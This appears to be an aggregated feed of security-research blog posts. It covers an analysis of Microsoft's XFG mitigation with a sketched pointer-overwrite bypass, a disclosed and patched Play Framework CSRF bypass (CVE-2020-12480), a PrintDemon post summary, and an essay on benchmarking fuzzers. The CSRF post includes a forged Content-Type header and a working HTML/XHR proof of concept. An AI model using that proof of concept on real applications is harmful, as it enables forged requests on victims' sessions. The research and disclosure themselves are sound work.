My last CrowdStrike blog post touches on XFG, but not in too much detail. XFG essentially is a more “hardened” version of CFG. How so? XFG, at compile time, produces a “type-based hash” of a function that is going to be called in a control flow transfer. This hash will be placed 8 bytes above the target function, and will be compared against a preserved version of that hash when an XFG dispatch function is executed. If the hashes match, control flow transfer is then passed to the in scope function that was checked. If the hashes differ, the program crashes.
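A toy model may help here. The sketch below is only an illustration under loud assumptions: Microsoft's actual hashing algorithm is not described in this post, so a truncated SHA-256 of a signature string is swapped in as a stand-in, and every name in it (type_hash, Function, xfg_call, the example functions) is hypothetical. What it does show is the principle: the call site carries the hash of the type it expects, the target carries the hash of its own type, and the call only goes through when the two agree.

```python
import hashlib


def type_hash(return_type, param_types):
    """Hypothetical 64-bit hash of a function type (NOT Microsoft's algorithm)."""
    signature = f"{return_type}({','.join(param_types)})"
    digest = hashlib.sha256(signature.encode()).digest()
    return int.from_bytes(digest[:8], "little")


class Function:
    """A call target that carries the hash of its own type."""

    def __init__(self, name, return_type, param_types):
        self.name = name
        # Stands in for the hash stored 8 bytes above the function.
        self.stored_hash = type_hash(return_type, param_types)


def xfg_call(call_site_hash, target):
    """Allow the transfer only if the target's type hash matches."""
    if target.stored_hash != call_site_hash:
        raise RuntimeError(f"XFG violation: type mismatch for {target.name}")
    return target.name


print_message = Function("print_message", "void", [])
add_one = Function("add_one", "int", ["int"])
call_site = type_hash("void", [])  # the call site expects void(void)

print(xfg_call(call_site, print_message))
try:
    xfg_call(call_site, add_one)
except RuntimeError as err:
    print(err)
```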

Let’s take a look a bit more at this. Firstly, let’s compile our program with XFG!

Note that you will need Visual Studio 2019 Preview + at least Windows 10 21H1 in order to use XFG. Additionally, XFG is not found in the GUI compilation options.

Using the /guard:xfg flag in compilation and linking, we can enable XFG for our application.

Notice that even though it was not selected, CFG is still enabled for our application.

Let’s crack open IDA again to see how the main() function looks with the addition of XFG.

Very interesting! Firstly, we can see that R10 takes in the value of the XFG “type-based” hash. Then, a call is performed to the XFG dispatch call __guard_xfg_dispatch_icall_fptr. Note that the hash has been deemed “immutable” by Microsoft and cannot be modified by an attacker, due to its read only state.

In the image, below, the location of the XFG hash is at 00007ff7ded4110c

We can see that this address is executable (obviously) and readable - with the ability to write disabled.

Additionally, you can use the dumpbin tool to print out the functions protected by CFG/XFG. Functions protected by XFG are denoted with an X

Before we move on, one interesting thing to note is that the XFG hash is already placed 8 bytes above an XFG protected function BEFORE any code execution actually occurs.

For instance, Source!cfgTest is an XFG protected function. 8 bytes above this function is the hash seen in the previous image, but with an additional bit set.

We will see why this additional bit has been set when we step through the functions that perform XFG checks.

Moving on, let’s step through this in WinDbg to see what we are working with here, and how execution flow will go.

Firstly, execution lands on the XFG dispatch function.

This time, when the __guard_xfg_dispatch_icall_fptr function is dereferenced, a jump to the function ntdll!LdrpDispatchUserCallTargetXFG is performed.

Firstly, a bitwise OR of the XFG hash and 1 occurs, with the result placed in R10. In our case, this sets a bit in the XFG function hash.

Next, a test al, 0xf operation occurs, which performs a bitwise AND between the lower 8 bits of AX (AL) and 0xf.

As we can see from the image above, this sets the zero flag in our case. Additionally, now we have reached a possible jump within ntdll!LdrpDispatchUserCallTargetXFG

Since the zero flag has been set, we will NOT take the jump and instead move on to the next instruction, test ax, 0xFFF.

Stepping through test ax, 0xFFF, which will perform a bitwise AND with the lower 16 bits of EAX and 0xFFF, plus set the zero flag accordingly, we see that we have cleared the zero flag in the image below. This means the jump will not occur, and we continue to move deeper into the ntdll!LdrpDispatchUserCallTargetXFG function.

Finally, we land on the cmp instruction which compares the hash 8 bytes above RAX (our target function) with the hash preserved in R10.

The compare statement, because the values are equal, causes the zero flag to be set. This skips the next jump, and performs the final jump to our target function in RAX!
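
The sequence of checks stepped through above can be summarized in a short Python model. This is only a sketch: the addresses and hash values are made up for illustration, and the "other_path" label is a placeholder, since this walkthrough only follows the path that ends in the jump to the target.

```python
# Toy model of the checks stepped through above. The addresses, hashes, and
# the "other_path" label are illustrative assumptions, not values from ntdll.

def xfg_dispatch(memory, target, call_site_hash):
    """Return "jump_to_target" when every check passes, else "other_path"."""
    r10 = call_site_hash | 1                 # or r10, 1
    if (target & 0xF) != 0:                  # test al, 0xf (jump taken if ZF clear)
        return "other_path"
    if (target & 0xFFF) == 0:                # test ax, 0xFFF (jump taken if ZF set)
        return "other_path"
    if memory.get(target - 8) != r10:        # cmp: hash 8 bytes above RAX vs R10
        return "other_path"
    return "jump_to_target"                  # final jump to the function in RAX


HASH = 0x1122334455667870                    # hypothetical call-site hash
TARGET = 0x7FF7DED41230                      # hypothetical function address
memory = {TARGET - 8: HASH | 1}              # stored hash already has the extra bit set

print(xfg_dispatch(memory, TARGET, HASH))
print(xfg_dispatch(memory, TARGET, 0x0FEDCBA987654870))
```

The first call models a legitimate indirect call; the second models a call site whose hash does not match the one stored above the target.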

This is how a function protected by XFG is checked! Let’s now edit our code a bit and explore XFG a bit more.

Let’s Keep Going!

Recall that an XFG hash is made up of a function’s return type and any parameters. Let’s update our code to invoke another function of a different type.

We have changed the protectMe2() function to a function that returns an integer and takes a parameter of the type integer. This is different than our void cfgTest() function. We also set a function pointer, int (*cfgTest2) equal to the int protectMe2() function in order to create a new XFG hash for a different function type (int in this case). Let’s recompile our program and disassemble it in IDA to see how the two functions may vary from an XFG perspective.

Very interesting! As we can see from the above image, there are two different hashes now. The hash for our original function has remained the same. The hash for the int protectMe2() function is very different, although the last 12 bits of each hash are 870 in hexadecimal in our case. This is interesting and may be worth noting.

Additionally, static and dynamic analysis both show that, even before any code has executed, the actual hash is already placed 8 bytes above each function. The hashes also already have an additional bit set, just as we saw last time.

Let’s take this opportunity to showcase why XFG is significantly stronger than CFG.

Let’s simulate an arbitrary write again by overwriting what Source!cfgTest1 points to with Source!protectMe2.

After simulating the arbitrary write, we pick up execution in ntdll!LdrpDispatchUserCallTargetXFG again. Stepping through a few instructions, we once again land on the cmp instruction which checks to see if the preserved XFG hash matches the current XFG hash.

As we can see below, the hashes do not match!

Since the hashes do not match, XFG determines that the function pointer has been overwritten with something it should not have been, and the program crashes. Even though the function pointer was overwritten with another function within the same bitmap, XFG will still crash the process.

Let’s examine another scenario, with two functions of the same return type - but not the same amount of parameters.

To achieve this, our code has been edited to the following.

As we can see from the above image, we are using all integer functions now. However, the int cfgTest() function has two more parameters than the int protectMe2() function. Let’s compile and perform some static analysis in IDA.

The only difference between the two functions protected by XFG is the amount of parameters that int cfgTest() has, and yet the hashes are TOTALLY different. From a defensive perspective, it seems like even very similar functions are viewed as “very different”.

Additionally, we notice that the last 12 bits of the int cfgTest() hash have become 371 in hexadecimal instead of the previously mentioned 871 value. This means that XFG hashes seem to be unique until the last 8 bits. This is indicative of the hash only being unique up until about 56 bits.

As a sanity check and for completeness sake, let’s see what happens when two identical functions are assigned an XFG hash.

OMG Samesies!

Here is an edited version of our code, with two identical functions.

Disassembling the functions in IDA, we can see that the hashes this time are identical.

Obviously, since the hashing process for an XFG hash takes a function prototype and hashes it, the two hashes are going to be the same. I would not call this a flaw at all, because it is obvious Microsoft knew this going in. However, I feel this is a nice win for Microsoft in terms of their overall CFI strategy because, as David pointed out, this added very little overhead to the already existing CFG infrastructure.

However, from an adversarial standpoint, it must be said: function pointers protected by XFG can still be overwritten, so long as the new target has a prototype identical to that of the original function.
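
To make the "same prototype, same hash" behavior concrete, here is a minimal sketch using a stand-in hash. The toy_prototype_hash function is hypothetical and is not Microsoft's algorithm (which is not described here); it only illustrates that any hash computed purely from the return type and parameter types cannot tell two identically typed functions apart.

```python
import hashlib

def toy_prototype_hash(return_type, param_types):
    """Stand-in for a type-based hash. NOT the real XFG hashing algorithm."""
    signature = return_type + "(" + ",".join(param_types) + ")"
    digest = hashlib.sha256(signature.encode("utf-8")).digest()
    return int.from_bytes(digest[:8], "little")   # keep 64 bits

# Two functions with identical prototypes: void f(void)
hash_a = toy_prototype_hash("void", [])
hash_b = toy_prototype_hash("void", [])

# Same return type, different number of parameters
hash_one_param = toy_prototype_hash("int", ["int"])
hash_three_params = toy_prototype_hash("int", ["int", "int", "int"])

print(hash_a == hash_b)                      # identical prototypes collide by design
print(hash_one_param == hash_three_params)   # differing prototypes do not
```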

Potential Bypasses?

As mentioned above, functions with identical prototypes generate identical XFG hashes. Knowing this, it seems possible to overwrite a function pointer with the address of a different function that has an identical prototype. Even so, this is SIGNIFICANTLY stronger than CFG in terms of what functions can actually be called.

Let’s talk about one more potential bypass.

As we know, functions protected by XFG have an XFG hash placed above them (8 bytes above, to be more specific). What would happen, for instance, if we performed a function pointer overwrite and called into the middle of a function, like KERNELBASE!VirtualProtect?

As we can see from the above image, calling into the middle of this function shows us that these hex numbers are being interpreted as opcodes, not memory addresses. This means that if XFG checks if a function pointer is overwritten by KERNELBASE!VirtualProtect, it would load the address of this function into RAX per the usual routine for XFG/CFG function checks. Then, this address is dereferenced at an offset of negative 8 to perform the XFG check. When this dereference happens, since this address contains opcodes, the opcodes that are present when calling into the middle of the function will be used in the XFG check.

Let’s perform a function pointer overwrite.

Note that the machine was restarted in between screenshots, causing addresses to change (but the symbols will remain the same).

Next, let’s step through the XFG dispatch functions and reach the compare statement.

Hitting the compare statement, we can see that R10 contains the preserved XFG hash, while RAX just contains the address of KERNELBASE!VirtualProtect + 0x50.

Taking a look at RAX - 8, where the XFG check occurs, we can see that the opcodes that reside within KERNELBASE!VirtualProtect are being treated as the “compared hash”.

Although this compare will fail, this brings up an interesting point.

Since calling into the middle of a function results in the function’s data being treated as opcodes and not memory addresses (usually), it may be possible for an adversary to utilize an arbitrary read/write primitive to do the following.

  1. Locate the XFG hash for a function you want to overwrite
  2. Perform a loop to dereference the process space’s memory and look for patterns that are identical to the XFG hash (remember, we still have to abide by CFG’s rules and choosing a function exported by the application or a function that is additionally located in the same bitmap)
  3. Overwrite the function pointer with any viable candidates

Although you most likely are going to be very hard pressed to find anything identical to the hash in terms of opcodes in the middle of a function AND additionally make whatever you find useful from an attacker’s perspective, this is still possible it seems.
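
The search in step 2 can be sketched as a byte-pattern scan. This is a hypothetical illustration only: the buffer, base address, and hash are invented, the CFG bitmap constraint is not modeled, and the alignment tests simply mirror the test al, 0xf and test ax, 0xFFF checks seen earlier in the dispatch function.

```python
def find_hash_candidates(image, base_address, xfg_hash):
    """Return addresses whose preceding 8 bytes equal the hash with bit 0 set."""
    pattern = (xfg_hash | 1).to_bytes(8, "little")   # value compared against R10
    candidates = []
    start = image.find(pattern)
    while start != -1:
        target = base_address + start + 8            # address that would land in RAX
        # Keep only targets that would survive the two alignment tests.
        if (target & 0xF) == 0 and (target & 0xFFF) != 0:
            candidates.append(target)
        start = image.find(pattern, start + 1)
    return candidates


XFG_HASH = 0x1122334455667870                        # hypothetical hash
BASE = 0x10000                                       # hypothetical mapping address
pattern_bytes = (XFG_HASH | 1).to_bytes(8, "little")

image = bytearray(64)                                # stand-in for dumped memory
image[8:16] = pattern_bytes                          # target would be BASE + 16 (aligned)
image[21:29] = pattern_bytes                         # target would be BASE + 29 (unaligned)

print([hex(address) for address in find_hash_candidates(bytes(image), BASE, XFG_HASH)])
```

Even when a match is found, the bytes at the resulting target still have to form something useful to an attacker, which is the hard part noted above.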

Final Thoughts

I think personally that XFG is an awesome mitigation and I am excited to see how people get creative with the solution. However, until CET comes into play, overwriting return addresses on the stack seems like it will still be fair game. I think the combination of XFG and CET is going to be very interesting for exploitation in the future. I think XFG is a great and pretty creative mitigation. However, it remains to be seen how it performs against Indirect Branch Tracking (IBT), which is CET’s forward-edge protection. All together, I think Microsoft has done a great thing with XFG by implementing it and not letting all of the work done with CFG go to waste.

As always! Peace, love, and positivity :-)

The Current State of Exploit Development, Part 2

20 August 2020 at 00:00

CrowdStrike Blog

Today I am very happy to have released my second blog for CrowdStrike! This blog, which builds off of my last one, talks about some additional mitigations like ACG, XFG, and VBS/HVCI which have made exploitation more expensive and time consuming. This blog rounds out the series and I hope you have found it useful! I learned a lot when I put this two part series together.

You can find the blog here. Enjoy!

CSRF Protection Bypass in Play Framework

19 August 2020 at 22:00

This blog post illustrates a vulnerability affecting the Play framework that we discovered during a client engagement. This issue allows a complete Cross-Site Request Forgery (CSRF) protection bypass under specific configurations.

By their own words, the Play Framework is a high velocity web framework for java and scala. It is built on Akka which is a toolkit for building highly concurrent, distributed, and resilient message-driven applications for Java and Scala.

Play is a widely used framework and is deployed on web platforms for both large and small organizations, such as Verizon, Walmart, The Guardian, LinkedIn, Samsung and many others.

Old school anti-CSRF mechanism

In older versions of the framework, CSRF protection was provided by an insecure baseline mechanism - even when CSRF tokens were not present in the HTTP requests.

This mechanism was based on the basic differences between Simple Requests and Preflighted Requests. Let’s explore the details of that.

A Simple Request has a strict ruleset. Whenever these rules are followed, the user agent (e.g. a browser) won’t issue an OPTIONS request even if this is through XMLHttpRequest. All rules and details can be seen in this Mozilla’s Developer Page, although we are primarily interested in the Content-Type ruleset.

The Content-Type header for simple requests can contain one of three values:

  • application/x-www-form-urlencoded
  • multipart/form-data
  • text/plain

If you specify a different Content-Type, such as application/json, then the browser will send an OPTIONS request to verify that the web server allows such a request.
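
As a rough illustration of the Content-Type rule only, the check can be modeled as below. This is a simplified sketch, not browser code: real user agents apply additional rules (request method, other headers), and the function name is hypothetical.

```python
# The three Content-Type values that keep a request "simple".
SIMPLE_CONTENT_TYPES = {
    "application/x-www-form-urlencoded",
    "multipart/form-data",
    "text/plain",
}

def triggers_preflight(content_type):
    """Model only the Content-Type rule: compare the media type before any parameters."""
    media_type = content_type.split(";", 1)[0].strip().lower()
    return media_type not in SIMPLE_CONTENT_TYPES

print(triggers_preflight("application/json"))            # preflight (OPTIONS) expected
print(triggers_preflight("text/plain; charset=UTF-8"))   # stays a simple request
```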

Now that we understand the differences between preflighted and simple requests, we can continue onwards to understand how Play used to protect against CSRF attacks.

In older versions of the framework (until version 2.5, included), a black-list approach on receiving Content-Type headers was used as a CSRF prevention mechanism.

In the 2.8.x migration guide, we can see how users could restore Play’s old default behavior if required by legacy systems or other dependencies:

application.conf

play.filters.csrf {
  header {
    bypassHeaders {
      X-Requested-With = "*"
      Csrf-Token = "nocheck"
    }
    protectHeaders = null
  }
  bypassCorsTrustedOrigins = false
  method {
    whiteList = []
    blackList = ["POST"]
  }
  contentType.blackList = ["application/x-www-form-urlencoded", "multipart/form-data", "text/plain"]
}

In the snippet above we can see the core of the old protection. The contentType.blackList setting contains three values, which are identical to the content type of “simple requests”. This has been considered as a valid (although not ideal) protection since the following scenarios are prevented:

  • attacker.com embeds a <form> element which posts to victim.com
    • Form allows form-urlencoded, multipart or plain, which are all blocked by the mechanism
  • attacker.com uses XHR to POST to victim.com with application/json
    • Since application/json is not a “simple request”, an OPTIONS will be sent and (assuming a proper configuration) CORS will block the request
  • victim.com uses XHR to POST to victim.com with application/json
    • This works as it should, since the request is not cross-site but within the same domain
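
The three scenarios above can be modeled with a few lines of Python. This is a simplified sketch of the blacklist idea, not Play's actual filter code: the function name is hypothetical, bypass headers are ignored, and the content type is assumed to be already parsed.

```python
# Values taken from the configuration snippet above.
METHOD_BLACKLIST = {"POST"}
CONTENT_TYPE_BLACKLIST = {
    "application/x-www-form-urlencoded",
    "multipart/form-data",
    "text/plain",
}

def requires_csrf_token(method, content_type):
    """True when the legacy rules would demand a CSRF token for this request."""
    if method not in METHOD_BLACKLIST:
        return False
    return content_type in CONTENT_TYPE_BLACKLIST

# Cross-site <form> POST: a token is demanded, so the forged request is rejected.
print(requires_csrf_token("POST", "application/x-www-form-urlencoded"))
# JSON POST: no token demanded here; cross-site use is left to the CORS preflight.
print(requires_csrf_token("POST", "application/json"))
```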

Hence, you now have CSRF protection. Or do you?

Looking for a bypass

Armed with this knowledge, the first thing that comes to mind is that we need to make the browser issue a request that does not trigger a preflight and that does not match any values in the contentType.blackList setting.

The first thing we did was map out requests that we could modify without sending an OPTIONS preflight. This came down to a single request: Content-Type: multipart/form-data

This appeared immediately interesting thanks to the boundary value: Content-Type: multipart/form-data; boundary=something

The description can be found here:

For multipart entities the boundary directive is required, which consists of 1 to 70 characters from a set of characters known to be very robust through email gateways, and not ending with white space. It is used to encapsulate the boundaries of the multiple parts of the message. Often, the header boundary is prepended with two dashes and the final boundary has two dashes appended at the end.

So, we have a field that can actually be modified with plenty of different characters and it is all attacker-controlled.

Now we need to dig deep into the parsing of these headers. In order to do that, we need to take a look at Akka HTTP which is what the Play framework is based on.

Looking at HttpHeaderParser.scala, we can see that these headers are always parsed:

private val alwaysParsedHeaders = Set[String](
    "connection",
    "content-encoding",
    "content-length",
    "content-type",
    "expect",
    "host",
    "sec-websocket-key",
    "sec-websocket-protocol",
    "sec-websocket-version",
    "transfer-encoding",
    "upgrade"
)

And the parsing rules can be seen in HeaderParser.scala which follows RFC 7230 Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing, June 2014.

def `header-field-value`: Rule1[String] = rule {
  FWS ~ clearSB() ~ `field-value` ~ FWS ~ EOI ~ push(sb.toString)
}
def `field-value` = {
  var fwsStart = cursor
  rule {
    zeroOrMore(`field-value-chunk`).separatedBy { // zeroOrMore because we need to also accept empty values
      run { fwsStart = cursor } ~ FWS ~ &(`field-value-char`) ~ run { if (cursor > fwsStart) sb.append(' ') }
    }
  }
}
def `field-value-chunk` = rule { oneOrMore(`field-value-char` ~ appendSB()) }
def `field-value-char` = rule { VCHAR | `obs-text` }
def FWS = rule { zeroOrMore(WSP) ~ zeroOrMore(`obs-fold`) }
def `obs-fold` = rule { CRLF ~ oneOrMore(WSP) }

If these parsing rules are not obeyed, the value will be set to None. Perfect! That is exactly what we need for bypassing the CSRF protection - a “simple request” that will then be set to None thus bypassing the blacklist.

How do we actually forge a request that is allowed by the browser, but it is considered invalid by the Akka HTTP parsing code?

We decided to let fuzzing answer that, and quickly discovered that the following transformation worked: Content-Type: multipart/form-data; boundary=—some;randomboundaryvalue

An extra semicolon inside the boundary value would do the trick and mark the request as illegal:

POST /count HTTP/1.1
Host: play.local:9000
...
Content-Type: multipart/form-data;boundary=------;---------------------139501139415121
Content-Length: 0

Response

Response:
HTTP/1.1 200 OK
...
Content-Type: text/plain; charset=UTF-8
Content-Length: 1

5

This is also confirmed by looking at the logs of the server in development mode:

a.a.ActorSystemImpl - Illegal header: Illegal 'content-type' header: Invalid input 'EOI', expected tchar, OWS or ws (line 1, column 74): multipart/form-data;boundary=------;---------------------139501139415121

And by instrumenting the Play framework code to print the value of the Content-Type:

Content-Type: None
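
The effect can be reproduced with a toy model. The sketch below is an assumption-laden stand-in: strict_media_type is a hypothetical, much simplified parser (not Akka HTTP's grammar) that rejects any parameter lacking a name=value shape, and is_blocked mirrors the blacklist lookup on the parsed result.

```python
# Content types taken from the contentType.blackList setting shown earlier.
CONTENT_TYPE_BLACKLIST = {
    "application/x-www-form-urlencoded",
    "multipart/form-data",
    "text/plain",
}

def strict_media_type(header_value):
    """Return the media type, or None if any parameter is malformed (toy parser)."""
    parts = [part.strip() for part in header_value.split(";")]
    media_type, params = parts[0].lower(), parts[1:]
    for param in params:
        name, separator, value = param.partition("=")
        if not separator or not name or not value:
            return None                      # the whole header is treated as illegal
    return media_type

def is_blocked(header_value):
    """A request is blocked only if its parsed content type is blacklisted."""
    return strict_media_type(header_value) in CONTENT_TYPE_BLACKLIST

normal = "multipart/form-data; boundary=----139501139415121"
forged = "multipart/form-data;boundary=------;---------------------139501139415121"

print(strict_media_type(normal), is_blocked(normal))
print(strict_media_type(forged), is_blocked(forged))
```

In this model the forged header parses to None, and None is not in the blacklist, so the request slips through without a token check.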

Finally, we built the following proof-of-concept and notified our client (along with the Play framework maintainers):

<html>
    <body>
        <h1>Play Framework CSRF bypass</h1>
        <button type="button" onclick="poc()">PWN</button>
        <p id="demo"></p>
        <script>
        function poc() {
            var xhttp = new XMLHttpRequest();
            xhttp.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                    document.getElementById("demo").innerHTML = this.responseText;
                }
            };
            xhttp.open("POST", "http://play.local:9000/count", true);
            xhttp.setRequestHeader(
                "Content-type",
                "multipart/form-data; boundary=------;---------------------139501139415121"
            );
            xhttp.withCredentials = true;
            xhttp.send("");
        }
        </script>
    </body>
</html>

Credits & Disclosure

This vulnerability was discovered by Kevin Joensen and reported to the Play framework via [email protected] on April 24, 2020. The issue was fixed in Play 2.8.2 and 2.7.5. CVE-2020-12480 and all details were published by the vendor on August 10, 2020. Thanks to James Roper of Lightbend for the assistance.

CVE-2020-1337 – PrintDemon is dead, long live PrintDemon!

By: voidsec
11 August 2020 at 12:52

Banner Image by Sergio Kalisiak. TL;DR: I will explain, in detail, how to trigger the PrintDemon exploit and dissect how I discovered a new 0-day: Microsoft Windows EoP CVE-2020-1337, a bypass of PrintDemon’s recent patch via a Junction Directory (TOCTOU). Contents: PrintDemon primer, how the exploit works? PrinterPort WritePrinter Shadow Job File Binary Diffing CVE-2020-1048 […]

The post CVE-2020-1337 – PrintDemon is dead, long live PrintDemon! appeared first on VoidSec.

Some thoughts on fuzzing

11 August 2020 at 07:11

Foreword

This blog is a bit weird, this is actually a message I posted in response to a fuzzbench issue, but honestly, I think it warranted a blog, even if it’s a bit unpolished!

You can find the discussion at fuzzbench issue tracker #654

Social

I’ve been streaming a lot more regularly on my Twitch! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!

The blog

Hello again Today!

So, I’d like to address a few things that I’ve thought of a bit more over time and want to emphasize.

Visualizations, and what I’m often looking for in data

When it comes to visualizations, I don’t really mind much which graphs are displayed by default, linear vs logscale, time-based or per-case-based, but both options should be toggleable from the default view. I’m not a web dev, but having an interactive graph would be pretty nice, allowing for turning on and off of certain lines, zooming in and out, and changing scales/axes. But, I think we’re in agreement here. I personally believe that logscale should be default, and I don’t see how it’s anything but better, unless you only care about seeing where things “flatten out”. But in that case, it’s just as visible in logscale, you just have to be logscale aware.

Here’s an example of what I typically graph when I’m running and tuning a fuzzer. I’m usually doing side-by-side comparisons of small fuzzer tweaks against my prior best runs, and plotting both on a time domain and a fuzz case domain. I’ve included the linear-scale plots just for comparison with the way we currently do things, but I personally never use linear scale as I just find it to be worse in all aspects.

image

By using a linear scale, we’re unable to see anything about what happens in the fuzzer in the first ~20 min or so. We just see a vertical line. In the log scale we see a lot more of what is happening. This graph is comparing a fuzzer which does rand() % 20 rounds of mutation (medium corruption), versus rand() % 5 rounds of the same corruption (low corruption). We can see that early on medium corruption has much better properties, as it explores more aggressively. But there’s actually a point where they cross, and this is likely the point where the corruption becomes too great on average in the medium corruption, and ends up “ruining” previously good inputs, dramatically reducing the frequency with which we see good cases. It’s important to note that since the medium corruption is a superset of low corruption (eg, there’s a chance to do low corruption), both graphs would eventually converge to the exact same value.
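
For readers who want to picture the two settings, here is a minimal sketch of "rand() % N rounds" of corruption. The single-byte overwrite used as the mutation is an assumption made for illustration (the actual mutation is not specified here), and corrupt is a hypothetical helper that expects a non-empty input.

```python
import random

def corrupt(data, max_rounds, rng):
    """Apply rng.randrange(max_rounds) byte overwrites to a copy of a non-empty input."""
    out = bytearray(data)
    rounds = rng.randrange(max_rounds)            # equivalent of rand() % max_rounds
    for _ in range(rounds):
        # Assumed mutation: overwrite one random byte with a random value.
        out[rng.randrange(len(out))] = rng.randrange(256)
    return bytes(out), rounds

rng = random.Random(1234)                          # fixed seed for repeatable runs
seed_input = b"GET /index.html HTTP/1.1"

medium, medium_rounds = corrupt(seed_input, 20, rng)   # "medium corruption"
low, low_rounds = corrupt(seed_input, 5, rng)          # "low corruption"
print(medium_rounds, medium)
print(low_rounds, low)
```

Because every round count the low setting can pick (0 to 4) can also be picked by the medium setting (0 to 19), the medium setting is a superset of the low one, which is why the curves would eventually converge.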

There’s just so much information in this graph that stands out to me. I see that something about medium corruption performs well in the first ~100 seconds. There’s a really good lead at the early few seconds, and it tapers off throughout. This gives me feedback on maybe when and where I should use this level of corruption.

Further, since I have both a fuzz case graph and a time graph, I can see that medium corruption early on actually has better performance than low corruption. Once again, this makes sense: the more corruption, the more likely you are to produce an invalid input which is parsed less deeply. But from the coverage over case, I see that this isn’t a long term thing and eventually the performance seems to converge between the two. It’s important to note, the intersection point of the two lines varies by quite a bit in both the case domain and the time domain. This tells me that even though I just changed the mutator, it has affected the performance, likely due to the depth of the average input in the corpus, really neat!

Example analysis conclusion

I see that medium corruption in this case is giving me about 10x speedup in time-to-same-coverage, and also some performance benefits early on. I should adopt a dynamic corruption model which tunes this corruption amount maybe against time, or ideally, some other metric I could extract from the target or stats. I see that long-term, the low corruption starts to win, and for something that I’d run for a week, I’d much rather run the low corruption.

Even though this program is very simple, these graphs could pretty arbitrarily be stretched out to different time axes. If fuzzbench picks a deadline, for example, 1000 seconds, we would never know this about the fuzzer performance. I think this is likely what many fuzzers are now being tuned to, as the benchmarks often are 12/24/72 hour increments. Fuzzers often get some extra blips even deeper in the runs, and it’s really hard to estimate if these crosses would ever occur.

The case for cases

I personally extract most information from graphs which are plotted against number of fuzz cases rather than time. By doing benchmarks in a time domain, you factor in the performance of the fuzzer. This is the ground truth, and what really matters at the end of the day with complete products. But it’s not the ground truth for fuzzers in development. For example, if I wanted to prototype a new mutation strategy for AFL, I would be forced to do it in C, avoid inefficient copies, avoid mallocs, etc. I effectively have to make sure my mutator is at-or-better than existing AFL mutator performance to use benchmarks like this.

When you do development on fuzz cases, you can start to inspect the efficiency of the fuzzer in terms of quality of cases produced. I could prototype a mutator in python for all I care, and see if it performs better than the stock AFL mutators. This allows me to cut corners and spend 1 day trying out a mutator, rather than 1 month making a mutator and then doing complex optimizations to make it work. During early stages of development, I would expect a developer to understand the ramifications of making it faster, and to have a ballpark idea of where it could be if the O(n^3) logic was turned into O(log n), and whether it’s possible.

Often times, the first pass of an attempt is going to be crude, and for no reason other than laziness (and not in a negative way)! There’s a time and a place to polish and optimize a technique, and it’s important that there can be information learned from very preliminary results. Most performance in standard feedback mechanisms and mutation strategies can be solved with a little bit of engineering, and most developers should be able to gauge the best-case big-O for their strategy, even if that’s not the algorithmic complexity of their initial implementation.

Yep, looking at coverage over cases adds nuance, but I think we can handle it. Given most fuzzing tools, especially initial passes, are already so un-optimized, I’m really not worried about any performance differences in AFL/libfuzzer/etc when it comes to single-core performance.

Scaling

Scaling of performance is really missing from fuzzbench. At every company I’ve worked at, big and small, even for the most simple targets we’re fuzzing we’re running at least ~50-100 cores. I presume (I don’t know for sure) that fuzzbench is comparing single core performance. That’s great, it’s a useful stat and one I often control for, as single-core, coverage/case is often controlled for both scaling and performance, leading to great introspection into the raw logic of the fuzzer.

However, in reality, the scaling of these tools is critical for actual use. If AFL is 20% faster single-core, that’ll likely make it show up at the top of fuzzbench, given relative parity of mutation strategies. That’s great, the performance takes engineering effort and should not be undervalued. In fact, most of my research is focused around making fuzzers fast, I’ve got multiple fuzzers that can handle 10s of billions of fuzz cases per second on a single machine. It’s a lot of work to make these tools scale, much more so than single-core performance, which is often algorithmic fixes.

Suppose AFL is 20% faster single-core, but bottlenecks on fork() or write() and thus only scales to 20-30 cores (often where I see AFL really fall apart on medium size targets; 5-10 cores for small targets). If something like libfuzzer manages things in memory and can scale linearly with as many cores as you throw at it, libfuzzer is going to blow away any 20% performance gains seen single-core.

This information is very hard to benchmark. Well, not hard, but costly. Effectively, I’d like to see benchmarks of fuzzers scaled to ~16 cores on a single server, and ~128 cores distributed across at least 4 servers. This benchmarks: (A) whether the fuzzer can scale in the first place; if it can’t, that’s a big hit to real-world usability. (B) whether it can scale across servers (often, over the network); things like AFL-over-SMB would have brutal scaling properties here. (C) the scalability properties between cores on the same server, and how they transfer over the network.

I find it very unlikely that these fuzzers being benchmarked even remotely have similar scaling properties. AFL struggles to scale even on a single server, even in persistent mode, due to the heavy use of syscalls and blocking IPC every fuzz case (signal(), read(), write(), per case IIRC, ~3-4 syscalls).

Scaling also puts a lot of pressure on infeasible fuzzing strategies proposed in papers. We’ve all seen them, the high-introspection techniques which extract memory, register, taint state from a small program and promise great results. I don’t disagree with the results, the more information you extract, pretty much directly correlates to an increase in coverage/case. But, eventually the data load gets very hard to share between cores, queue between servers, and even just process.

Measuring symbolic

Measuring symbolic was brought up a few times, as it would definitely have a much better coverage/case than a traditional fuzzer. But this nuance can easily be handled by looking at both coverage/case and coverage/time graphs. Learning what works well algorithmically should drive our engineering efforts to solve problems. While symbolic may have huge performance issues, it’s very likely that many of the parts of it (eg. taint tracking) can be approximated with lossy algorithms and data capturing, and it’s more about learning where it has strengths and weaknesses. Many of the analyses I’ve done on symbolic largely lead me to vectorized emulation, which allows for highly-compressed, approximated taint tracking, while still getting near-native (or even better) execution speeds.

The case against monolithic fuzzers

Learning what works is important to figure out where to invest our engineering time. Given the quality of code in fuzzing right now (often very poor), there’s a lot of things that I’d hate to see us rule out because our current methodologies do not support them. I really care about my reset times of fuzz cases, (often: the fork() costs), as well as determinism. In a fully deterministic environment, with fast resets, a lot of approximate strategies can be used. Trying to approximate where bytes came from in an input, flipping the bytes because you have a branch target which is interesting, and then smashing those bytes in can give good information about the relation of those bytes to the input. Hell, with fast resets and forking, you can do partial fuzzing where you fork() and snapshot multiple times during a fuzz case, and you can progressively fuzz “from” different points in the parser. This works especially well for protocols where you can snapshot at each packet boundary.

These sorts of techniques and analyses don’t really work when we have monolithic fuzzers. The performance of existing fuzzers is often quite poor (AFL fork(), etc), or does not support partial execution (persistent modes, libfuzzer, etc). This leads to us not being able to even research these techniques. As we keep bolting things onto existing fuzzers and treating them like big blobs, we’ll get further and further from being able to learn the isolated properties of fuzzers and find the best places to apply certain strategies.

Why I don’t care much about fuzzer performance for benchmarking

Reset speed

